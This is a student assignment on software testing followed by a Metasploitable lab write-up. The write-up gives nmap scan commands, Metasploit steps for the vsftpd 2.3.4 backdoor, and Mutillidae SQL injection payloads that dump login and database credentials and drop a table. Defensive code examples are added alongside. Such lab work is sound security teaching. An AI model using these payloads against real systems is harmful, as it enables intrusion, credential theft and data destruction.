FCS Assignment 3

Etash Tyagi
2019360
December 2021

1 Software Testing

1.1 Recoverability

• In the context of software, recoverability is the capability to re-establish its level of
performance and recover the data affected by a system failure or attack.

• Data recovery can be ensured by storing data in secondary storage, to prevent complete
loss of data.

• For a chat application, messages can also be stored on the user's local device (via the
browser cache or local storage), eliminating the need for server-side storage altogether. In
this case, the worst that can happen after a failure is that one message is not delivered
to its destination.

• If for some reason messages must be stored in a database, RAID (redundant array of
independent disks) can be used to introduce redundancy and make recovery from disk
failure easier.

• Data can also be kept on offline servers across multiple different machines, to be used
in case of failure.

• While testing, it should be ensured that the backup and the current system are compatible,
that data is correctly stored on the backup device, and that the data can be safely
recovered and interpreted (decrypted).

• The hardware should also be tested to ensure minimal chance of complete failure.
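The last two bullets describe a recoverability test. As an added example (not part of the assignment), the Python below backs up the chat messages of the earlier bullet together with an integrity manifest and then checks that a restore detects lost and altered records. The message data is constructed; the backup is not encrypted, so the decryption part of the check is not modelled.

```python
"""Recoverability check: back up records with a SHA-256 manifest, then verify
that a restore classifies every record as intact, missing or corrupt."""
import hashlib
import json
import os
import tempfile
from typing import Dict, List

# Constructed sample data: messages of a chat application, keyed by message id.
MESSAGES = {
    "m1": {"from": "alice", "to": "bob", "text": "hi"},
    "m2": {"from": "bob", "to": "alice", "text": "hello"},
    "m3": {"from": "alice", "to": "bob", "text": "did you get this?"},
}


def _digest(record: dict) -> str:
    """Canonical JSON so that the same record always hashes the same way."""
    return hashlib.sha256(json.dumps(record, sort_keys=True).encode()).hexdigest()


def write_backup(messages: Dict[str, dict], backup_dir: str) -> str:
    """One file per record plus manifest.json mapping id -> SHA-256; returns the manifest path."""
    os.makedirs(backup_dir, exist_ok=True)
    manifest = {}
    for mid, record in messages.items():
        with open(os.path.join(backup_dir, f"{mid}.json"), "w") as f:
            json.dump(record, f, sort_keys=True)
        manifest[mid] = _digest(record)
    manifest_path = os.path.join(backup_dir, "manifest.json")
    with open(manifest_path, "w") as f:
        json.dump(manifest, f)
    return manifest_path


def verify_restore(backup_dir: str) -> Dict[str, List[str]]:
    """Restore every record listed in the manifest and classify it as ok, missing or corrupt."""
    with open(os.path.join(backup_dir, "manifest.json")) as f:
        manifest = json.load(f)
    report: Dict[str, List[str]] = {"ok": [], "missing": [], "corrupt": []}
    for mid, expected in manifest.items():
        path = os.path.join(backup_dir, f"{mid}.json")
        if not os.path.exists(path):
            report["missing"].append(mid)
            continue
        try:
            with open(path) as f:
                record = json.load(f)
        except json.JSONDecodeError:
            report["corrupt"].append(mid)       # unreadable file counts as corrupt
            continue
        report["ok" if _digest(record) == expected else "corrupt"].append(mid)
    return report


def demo_clean_roundtrip() -> Dict[str, List[str]]:
    """Healthy backup device: every record restores and matches its digest."""
    with tempfile.TemporaryDirectory() as d:
        write_backup(MESSAGES, d)
        return verify_restore(d)


def demo_partial_failure() -> Dict[str, List[str]]:
    """Simulated disk failure: one record lost, one silently altered."""
    with tempfile.TemporaryDirectory() as d:
        write_backup(MESSAGES, d)
        os.remove(os.path.join(d, "m2.json"))
        with open(os.path.join(d, "m3.json"), "w") as f:
            json.dump({"from": "alice", "to": "bob", "text": "altered"}, f)
        return verify_restore(d)
```

The manifest is what makes "the data can be safely recovered" testable: without it a restore can only tell that a file exists, not that its content is the content that was backed up.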

1.2 Automatic Code Analysis

1.2.1 A

Automatic code analysis is a kind of code testing performed by software tools that try to detect
errors and vulnerabilities and bring them to the developer's attention. The types of code
analysis, with an example for each, are:

• Control Flow Analysis: Checks the order in which code is executed, finds unreachable
code, and checks for loops with multiple entry or exit points.
Example: int main(){return -1; int x = -1;}

• Data Use Analysis: Tracks variables, the data stored in them, datatype validation, etc.
Detects errors such as unused variables, variables written twice without being read, and
use of uninitialized variables.
Example: int main(){int x; return x;}

• Interface Analysis: Checks whether each use (call) of a function is consistent with its
definition.
Example: void x(){} int main(){int a = x(3);}

• Information Flow Analysis: Analyzes which inputs and intermediate variables the output
variables depend on.
Example: int main(){if (x){return 1;}; int x;}
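The C snippets above show what each analysis flags. The following Python, added here and not part of the assignment, implements the control flow, data use and interface checks over Python's own AST, so the findings can be seen being produced rather than only described. It is a deliberately small, flow-insensitive version of what an IDE or compiler does; SAMPLE is a constructed Python translation of the snippets above.

```python
"""Toy static analyzer: control flow, data use and interface checks over the
Python AST. Source-order based and flow-insensitive (no branch merging)."""
import ast
from typing import Dict, Iterator, List, NamedTuple, Tuple


class Finding(NamedTuple):
    kind: str      # "unreachable" | "unused" | "use-before-assign" | "arity"
    line: int
    message: str


def _in_evaluation_order(node: ast.AST) -> Iterator[ast.AST]:
    """Yield nodes roughly in evaluation order: for assignments the right-hand
    side comes before the targets, so `x = x + 1` reads x before writing it."""
    if isinstance(node, (ast.Assign, ast.AnnAssign, ast.AugAssign)):
        if node.value is not None:
            yield from _in_evaluation_order(node.value)
        targets = node.targets if isinstance(node, ast.Assign) else [node.target]
        for target in targets:
            yield from _in_evaluation_order(target)
        return
    yield node
    for child in ast.iter_child_nodes(node):
        yield from _in_evaluation_order(child)


def _data_use(func: ast.FunctionDef) -> List[Finding]:
    """Data use analysis: locals assigned but never read, and locals read before
    any assignment (the Python counterpart of `int x; return x;`)."""
    params = {a.arg for a in func.args.args + func.args.kwonlyargs}
    local_names = {n.id for n in ast.walk(func)
                   if isinstance(n, ast.Name) and isinstance(n.ctx, ast.Store)}
    first_store: Dict[str, int] = {}
    loaded, findings = set(), []
    for node in _in_evaluation_order(func):
        if not isinstance(node, ast.Name):
            continue
        if isinstance(node.ctx, ast.Store):
            first_store.setdefault(node.id, node.lineno)
        elif isinstance(node.ctx, ast.Load) and node.id in local_names:
            loaded.add(node.id)
            if node.id not in first_store and node.id not in params:
                findings.append(Finding("use-before-assign", node.lineno,
                                        f"'{node.id}' is read before it is assigned"))
    for name, line in first_store.items():
        if name not in loaded:
            findings.append(Finding("unused", line, f"'{name}' is assigned but never read"))
    return findings


def analyze(source: str) -> List[Finding]:
    tree = ast.parse(source)
    findings: List[Finding] = []
    # Interface analysis needs each function's declared arity (min, max) up front.
    arity: Dict[str, Tuple[int, int]] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef) and not (node.args.vararg or node.args.kwarg):
            positional = len(node.args.posonlyargs) + len(node.args.args)
            arity[node.name] = (positional - len(node.args.defaults),
                                positional + len(node.args.kwonlyargs))
    for node in ast.walk(tree):
        # Control flow analysis: anything after return/raise/break/continue in the
        # same block can never execute (cf. `return -1; int x = -1;`).
        for field in ("body", "orelse", "finalbody"):
            block = getattr(node, field, None)
            if isinstance(block, list) and all(isinstance(s, ast.stmt) for s in block):
                for stmt, following in zip(block, block[1:]):
                    if isinstance(stmt, (ast.Return, ast.Raise, ast.Break, ast.Continue)):
                        findings.append(Finding("unreachable", following.lineno,
                                                f"code after line {stmt.lineno} is unreachable"))
                        break
        # Interface analysis: a call must match the callee's declared parameters
        # (cf. `void x(){} ... x(3)`).
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id in arity:
            low, high = arity[node.func.id]
            given = len(node.args) + len(node.keywords)
            if not low <= given <= high:
                findings.append(Finding("arity", node.lineno,
                                        f"{node.func.id}() called with {given} argument(s), "
                                        f"declared to take {low}..{high}"))
        if isinstance(node, ast.FunctionDef):
            findings.extend(_data_use(node))
    return findings


# Constructed sample: Python versions of the C snippets above.
SAMPLE = """\
def x():
    return None

def main():
    a = x(3)          # interface: x() is declared with no parameters
    return a
    unused = -1       # control flow: unreachable (and never read)

def data_use():
    y = 1             # data use: assigned but never read
    print(total)      # data use: read before the assignment below
    total = 0
    return total
"""
```

Running `analyze(SAMPLE)` yields five findings: the bad call on line 5, the unreachable (and unused) assignment on line 7, the never-read `y` on line 10, and `total` read on line 11 before its assignment on line 12. Information flow analysis is left out; it needs a dependency graph between variables rather than a single pass.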

1.2.2 B

IntelliJ was used to answer this question.

Code Analysis Type       Sub-functionality       Supported
Control Flow Analysis    Unreachable Code        YES
Control Flow Analysis    Infinite Loop           YES
Data Use Analysis        Unused Variables        YES
Data Use Analysis        Data Type Validation    YES
Interface Analysis       Argument validation     YES

Table 1: IntelliJ automatic code analysis

1.3 Regression Testing

Regression testing is done to detect unintended changes in behaviour introduced by code changes.
It is typically performed after major changes to the code, to find unexpected bugs that arise
as a side effect of the intended change.

1.3.1 Test Case For Unlocking Phone

• The phone must either stay locked when a call comes in, or lock again after the call is picked up.

• Opening applications from the lock screen must not unlock the phone.

• Opening applications from the lock screen (such as the camera) must not expose user data.

• The notification bar should offer only a limited set of buttons, and pressing them must not
unlock the phone.

• There should be a way for the user to enable or disable lock-screen authentication.

1.3.2 Tests Specific To Face Unlock

The following are test cases for face unlock, in addition to the ones above:

• Facial features used for recognition must be hashed or encrypted and not shared with
anyone.

• Facial recognition should detect when the individual's eyes are closed, to prevent
unwarranted access.

• Make sure images captured for recognition are not cached, so that they do not bloat the
system.

• Make sure there is another way for the owner to unlock (e.g. two-factor authentication via
the registered email) in case the front camera stops working.

• Make sure facial detection is working correctly.

1.3.3 What Test Cases Stay Relevant After Update

The test cases for unlocking the phone (1.3.1) stay relevant (assuming face unlock is completely
replaced). In addition, the following are test cases for the new feature:

• The fingerprint used for recognition must be hashed or encrypted and not shared with
anyone.

• Make sure there is another way for the owner to unlock (e.g. two-factor authentication via
the registered email) in case the fingerprint recognition hardware stops working.

• Make sure the fingerprint scanner is working correctly.

1.3.4 Regression Test Plan

• Assess the code changes to gather insight into what was modified.

• Identify acceptable levels of risk.

• Run the test cases for unlocking the phone (1.3.1).

• Verify that the previous functionality (face unlock) is no longer accessible.

• Test the newly implemented functionality.

• Make sure features specific to the previous functionality are no longer present in the new one.

• Run code analysis if a vulnerability is found.
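The plan above can be turned into an executable regression suite. The Python below is an added example, not the assignment's code: a toy phone model whose unlock method is pluggable, so that the method-independent test cases of 1.3.1 run unchanged before (face) and after (fingerprint) the update, while a separate migration check covers "previous functionality is no longer accessible". The templates, salt and lock-screen shortcut list are constructed, and real biometric matching is fuzzy rather than a hash comparison.

```python
"""Regression suite for the lock-screen test cases, re-run across a change of
unlock method. Toy model for illustration only."""
import hashlib
import hmac
from typing import Callable, Dict


class Unlocker:
    """Base unlock method. Only a salted SHA-256 of the enrolled template is kept
    (test case: biometric data is hashed/encrypted), never the template itself."""
    method = "none"

    def __init__(self, enrolled: bytes, salt: bytes = b"constructed-salt") -> None:
        self.salt = salt
        self.enrolled_digest = hashlib.sha256(salt + enrolled).hexdigest()

    def verify(self, sample: bytes) -> bool:
        candidate = hashlib.sha256(self.salt + sample).hexdigest()
        return hmac.compare_digest(self.enrolled_digest, candidate)


class FaceUnlocker(Unlocker):
    method = "face"


class FingerprintUnlocker(Unlocker):
    method = "fingerprint"


class Phone:
    LOCK_SCREEN_SHORTCUTS = {"camera", "flashlight"}   # usable without unlocking (constructed)

    def __init__(self, unlocker: Unlocker) -> None:
        self.unlocker = unlocker
        self.locked = True
        self.in_call = False

    def unlock(self, method: str, sample: bytes) -> bool:
        # A retired method must never unlock, even with a valid old template (1.3.4).
        if method == self.unlocker.method and self.unlocker.verify(sample):
            self.locked = False
        return not self.locked

    def answer_call(self) -> None:
        self.in_call = True                 # answering never changes the lock state (1.3.1)

    def lock_screen_action(self, action: str) -> bool:
        return action in self.LOCK_SCREEN_SHORTCUTS   # anything else is refused while locked

    def user_data_visible(self) -> bool:
        return not self.locked


def common_suite(make_phone: Callable[[], Phone], method: str, owner: bytes) -> Dict[str, bool]:
    """The 1.3.1 cases: independent of the unlock method, so re-run unchanged after the update."""
    results = {}
    p = make_phone()
    p.answer_call()
    results["call_keeps_phone_locked"] = p.locked
    p = make_phone()
    p.lock_screen_action("camera")
    results["camera_does_not_unlock_or_expose_data"] = p.locked and not p.user_data_visible()
    results["other_apps_refused_on_lock_screen"] = not make_phone().lock_screen_action("gallery")
    results["wrong_sample_rejected"] = not make_phone().unlock(method, b"not-the-owner")
    results["owner_sample_unlocks"] = make_phone().unlock(method, owner)
    return results


def migration_suite(make_phone: Callable[[], Phone], retired: str, old_owner: bytes) -> Dict[str, bool]:
    """The 1.3.4 case that only exists because a method was replaced."""
    return {"retired_method_rejected": not make_phone().unlock(retired, old_owner)}


FACE_TEMPLATE = b"constructed-face-template"
FINGER_TEMPLATE = b"constructed-finger-template"


def run_all() -> Dict[str, Dict[str, bool]]:
    def before_phone() -> Phone:
        return Phone(FaceUnlocker(FACE_TEMPLATE))

    def after_phone() -> Phone:
        return Phone(FingerprintUnlocker(FINGER_TEMPLATE))

    return {
        "before_update": common_suite(before_phone, "face", FACE_TEMPLATE),
        "after_update": common_suite(after_phone, "fingerprint", FINGER_TEMPLATE),
        "migration": migration_suite(after_phone, "face", FACE_TEMPLATE),
    }
```

The point of the split is that `common_suite` is the regression suite proper: the same keys appear in `before_update` and `after_update`, so a case that passed before the change and fails after it is a regression by construction, while `migration_suite` holds the checks that only make sense for this particular update.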

2 Metasploitable

Assumptions:

• The IP address of the victim is known (192.168.1.21 on the local network in this case).

• This link was followed to fix errors.

Figure 1: Finding IP Of Victim

2.1 OS Version

2.1.1 Summary

1. How: Using the Linux command 'nmap -O {victim ip}'.

2. Why: The -O option performs OS detection on the target machine.

3. Outcome: The victim's OS is identified as Linux 2.6.9 - 2.6.33.

2.1.2 Steps To Reproduce

1. Open terminal.

2. Install nmap if not already installed.

3. Use the command 'nmap -O {victim ip}'.

4. The OS and kernel are listed under OS details and OS CPE.

2.1.3 Result

The OS is Linux 2.6.9 - 2.6.33 and the kernel is Linux 2.6.

Figure 2: Nmap Find OS

2.2 Open Ports

2.2.1 Summary

1. How: Using the Linux command 'nmap -p- -sV {victim ip}'.

2. Why: -p- scans all ports; -sV detects the service version (used in later sections).

3. Outcome: 30 open ports were found on the victim's machine.

2.2.2 Steps To Reproduce

1. Open terminal.

2. Install nmap if not already installed.

3. Use the command 'nmap -p- -sV {victim ip}'.

4. Ports with STATE=open are open; SERVICE names the service running on each, and VERSION
is the application (and version) using the port.
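On the defending side, the same scan is the input to an exposure review: every open port is checked against the list of services that are supposed to be reachable. The Python below is an added example, not from the assignment. It parses nmap's grepable output format (`-oG`, which the steps above do not use but which exists for exactly this kind of post-processing) and reports open ports outside an assumed baseline. The scan text is constructed; only vsftpd 2.3.4 is taken from the write-up.

```python
"""Parse `nmap -oG` output and compare open ports against an approved baseline."""
from typing import Dict, List, NamedTuple


class PortRecord(NamedTuple):
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


# Constructed sample. Grepable output puts one host per line with tab-separated
# "Key: value" fields and 7 slash-separated columns per port:
# port/state/protocol/owner/service/rpc info/version/ (a '/' inside a field is written '|').
NMAP_GREPABLE = """\
# Nmap 7.80 scan initiated Wed Dec  1 10:00:00 2021 as: nmap -p- -sV -oG scan.gnmap 192.168.1.21
Host: 192.168.1.21 ()\tStatus: Up
Host: 192.168.1.21 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/, 3306/open/tcp//mysql//MySQL 5.0.51a/, 8009/filtered/tcp//ajp13///\tIgnored State: closed (65529)
# Nmap done at Wed Dec  1 10:05:00 2021 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# Assumed baseline: port -> the one service allowed to be exposed on it.
BASELINE: Dict[int, str] = {22: "ssh", 80: "http"}


def parse_grepable(text: str) -> List[PortRecord]:
    records: List[PortRecord] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                  # comment / summary lines
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue                                  # the "Status: Up" line carries no ports
        host = fields["Host"].split()[0]
        for entry in fields["Ports"].split(", "):
            cols = entry.split("/")
            if len(cols) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = cols[:7]
            records.append(PortRecord(host, int(port), proto, state, service, version))
    return records


def open_ports(records: List[PortRecord]) -> List[PortRecord]:
    return [r for r in records if r.state == "open"]


def unexpected_exposure(records: List[PortRecord], baseline: Dict[int, str]) -> List[PortRecord]:
    """Open ports missing from the baseline, or running a service other than the approved one."""
    return [r for r in open_ports(records) if baseline.get(r.port) != r.service]


if __name__ == "__main__":
    for r in unexpected_exposure(parse_grepable(NMAP_GREPABLE), BASELINE):
        print(f"{r.host} {r.port}/{r.proto} {r.service} ({r.version}) is not in the baseline")
```

Against the constructed scan the review flags 21/ftp, 23/telnet and 3306/mysql; the filtered 8009 is not reported because it is not reachable. Keeping the version column in the record is what lets the next step (2.3) be done defensively, by comparing versions against vendor advisories instead of against an exploit database.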

2.2.3 Result

The following are the open ports, with the service and version running on each:

Figure 3: Nmap Ports And Service Version

2.3 FTP Backdoor

2.3.1 Summary

1. How: Using Metasploit (Linux command 'msfconsole').

2. Why: Metasploit is used to find and exploit vulnerable systems.

3. Outcome: The file system was accessed.

2.3.2 Steps To Reproduce

1. Open terminal.

2. Install Metasploit (msfconsole) if not already installed.

3. Run the command 'msfconsole'.

4. Search for vulnerabilities in FTP using the service version (search "vsftpd 2.3.4").

5. Select the backdoor module (use exploit/unix/ftp/vsftpd_234_backdoor).

6. Set the victim (set RHOSTS {victim ip}).

7. Start the attack (exploit).

8. The file system can now be viewed over FTP.

2.3.3 Result

Figure 4: Start Metasploit

Figure 5: Metasploit Find Backdoors

Figure 6: Metasploit Exploit Backdoor

2.4 Mutillidae add-to-your-blog.php

2.4.1 Summary

1. How: Go to 'http://{victim ip}/mutillidae/?page=add-to-your-blog.php' and enter an SQL
injection in the text field.

2. Why: No SQL injection protection.

3. Outcome: A wrong date was put into a blog entry (multiple statements are disabled, so this
is the most that can be achieved here).

2.4.2 Steps to Reproduce

1. Go to 'http://{victim ip}/mutillidae/?page=add-to-your-blog.php'.

2. Enter "'" in the text area to get an SQL error.

3. Now enter the command "SQL Injection', '-1') #".

4. There will be an entry in the blog with date "0000-00-00".

2.4.3 Results

Figure 7: SQL Error

Figure 8: SQL Command

Figure 9: SQL Results

2.5 Mutillidae Credentials Leak

2.5.1 Summary

1. How: Go to 'http://{victim ip}/mutillidae/index.php?page=user-info.php' and enter SQL
injections in the username or password field.

2. Why: No SQL injection protection.

3. Outcome: Login and database credentials were leaked.

2.5.2 Steps To Reproduce

1. Go to 'http://{victim ip}/mutillidae/index.php?page=user-info.php'.

2. Enter "'" in username and "a" in password to get an SQL error.

3. For the login credentials, put the command "' UNION SELECT * FROM accounts #" in
username and "a" in password to get the list of all login credentials (result in fig 10).

4. To find the database holding the database credentials, do the following:

5. Enter the command "' UNION SELECT 1, TABLE_SCHEMA, TABLE_NAME, 1, 1
FROM INFORMATION_SCHEMA.TABLES #" in username and anything in password,
to see the list of all tables and their databases.

6. The database credentials are generally found in the mysql.user table. To find its columns,
enter the following command in username: "' UNION SELECT 1, TABLE_SCHEMA,
TABLE_NAME, COLUMN_NAME, 1 FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='user' AND TABLE_SCHEMA='mysql' #" and "a" in password to see the
columns.

7. We find that the User, Password and Host columns are needed to log in to the database.

8. Finally, to leak the database credentials, enter "' UNION SELECT 1, User, Password, Host,
1 FROM mysql.user #" in username and "a" in password.

9. To PURGE tables, go to the phpMyAdmin page ('http://{victim ip}/phpMyAdmin/'), log in
with the leaked credentials and enter the SQL command "DROP TABLE accounts" to delete all
account info.
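Both Mutillidae pages (2.4 and 2.5) fail for the same reason: user input is concatenated into the SQL text. The Python below, an added example that is neither the assignment's nor Mutillidae's code, puts that pattern next to the parameterised fix and runs both against an in-memory SQLite table constructed to stand in for accounts. The UNION payload is the write-up's, with MySQL's '#' line comment written as SQLite's '--'.

```python
"""String-built SQL (the Mutillidae flaw) beside the parameterised fix, on SQLite."""
import hashlib
import sqlite3
from typing import List, Tuple


def _hash(password: str) -> str:
    # SHA-256 keeps the example dependency-free; a real login store needs a slow,
    # salted password hash (bcrypt, scrypt or argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the accounts table; two columns so UNION SELECT * lines up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password_hash TEXT)")
    for user, pw in (("admin", "constructed-pw-1"), ("etash", "constructed-pw-2")):
        conn.execute("INSERT INTO accounts VALUES (?, ?)", (user, _hash(pw)))
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """user-info.php's pattern: the SQL text is assembled from untrusted input, so the
    input can change the query's structure (a quote breaks it, UNION appends to it)."""
    sql = ("SELECT username, password_hash FROM accounts WHERE username='" + username
           + "' AND password_hash='" + _hash(password) + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """Fix: constant SQL text with bound parameters. The driver never parses a value
    as SQL, so the same payload is just a username that does not exist."""
    sql = "SELECT username, password_hash FROM accounts WHERE username=? AND password_hash=?"
    return conn.execute(sql, (username, _hash(password))).fetchall()


def breaks_query(conn: sqlite3.Connection, username: str) -> bool:
    """True if the vulnerable lookup raises an SQL error for this input (step 2 of the
    write-up); a database error reaching the user is itself a finding."""
    try:
        lookup_vulnerable(conn, username, "a")
        return False
    except sqlite3.OperationalError:
        return True


# The write-up's UNION payload; SQLite spells MySQL's '#' line comment as '--'.
UNION_PAYLOAD = "' UNION SELECT * FROM accounts --"


if __name__ == "__main__":
    db = make_demo_db()
    print("quote breaks vulnerable query:", breaks_query(db, "'"))
    print("rows leaked by vulnerable lookup:", len(lookup_vulnerable(db, UNION_PAYLOAD, "a")))
    print("rows returned by safe lookup:    ", len(lookup_safe(db, UNION_PAYLOAD, "a")))
```

The quote input raises an SQL error only in the concatenated version; the parameterised version treats both the quote and the UNION payload as usernames that do not exist and returns nothing. The second half of 2.5 (reading INFORMATION_SCHEMA and mysql.user) additionally depends on the web application's database account having the privilege to read those tables; a least-privilege account for the application removes that step even where an injection remains.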

2.5.3 Results

The following figures show the steps used to replicate the attack and the results obtained:

Figure 10: SQL Website User Credentials

Figure 11: SQL Error

Figure 12: SQL Find All Tables Command

Figure 13: SQL Find All Tables Result

Figure 14: SQL Get Columns Of User Table

Figure 15: SQL Get Database Credentials

Figure 16: My PHP Admin Login

Figure 17: Delete Table SQL Command

Figure 18: Delete Table SQL Result
